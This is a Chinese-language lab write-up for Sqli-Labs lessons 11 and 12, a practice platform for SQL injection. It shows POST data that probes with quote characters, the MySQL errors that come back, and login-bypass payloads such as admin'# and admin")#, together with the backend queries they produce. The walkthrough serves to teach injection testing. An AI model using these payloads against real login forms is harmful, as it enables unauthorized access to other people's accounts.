Sqli-Labs是用来练习sql注入的好平台。project地址：https://github.com/Audi-1/sqli-labs
本文测试环境：使用phpstudy集成环境。mysql版本：5.5.53

Less-11 POST-Error Based -Single quotes- String
Less-12 POST - Error Based -Double quotes - String

考察post注入，所以要借助工具。比如burp。

Less 11

当post的数据如下时：

1	uname=admin'&passwd=chybeta&submit=Submit

报错语句为：

1	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta' LIMIT 0,1' at line 1

当post数据如下时：

1	uname=admin&passwd=chybeta'&submit=Submit

报错语句为：

1	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''chybeta'' LIMIT 0,1' at line 1

用如下payload即可登陆成功：

1	uname=admin'#&passwd=chybeta&submit=Submit

这样后台的语句为:

1	SELECT username, password FROM users WHERE username='admin'#' and password='chybeta' LIMIT 0,1

Less 12

和Less 11差不多，将单引号换成双引号。

post数据为：

1	uname=admin"&passwd=chybeta&submit=Submit

报错语句为：

1	You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'chybeta") LIMIT 0,1' at line 1

发现有括号保护。

最后的payload：

1	uname=admin")#&passwd=chybeta&submit=Submit

后台查询语句为：

1	SELECT username, password FROM users WHERE username=("admin")#") and password=("chybeta") LIMIT 0,1